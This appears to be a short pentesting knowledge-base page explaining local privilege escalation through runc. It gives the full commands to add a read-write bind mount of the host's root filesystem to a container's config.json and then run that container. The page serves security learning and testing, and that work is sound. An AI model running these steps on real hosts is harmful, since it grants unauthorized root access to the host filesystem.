# RunC Privilege Escalation ## Basic information If you want to learn more about **runc** check the following page: {% page-ref page="../../pentesting/2375-pentesting-docker.md" %} ## PE If you find that `runc` is installed in the host you may be able to **run a container mounting the root / folder of the host**. ```bash runc -help #Get help and see if runc is intalled runc spec #This will create the config.json file in your current folder Inside the "mounts" section of the create config.json add the following lines: { "type": "bind", "source": "/", "destination": "/", "options": [ "rbind", "rw", "rprivate" ] }, #Once you have modified the config.json file, create the folder rootfs in the same directory mkdir rootfs # Finally, start the container # The root folder is the one from the host runc run demo ```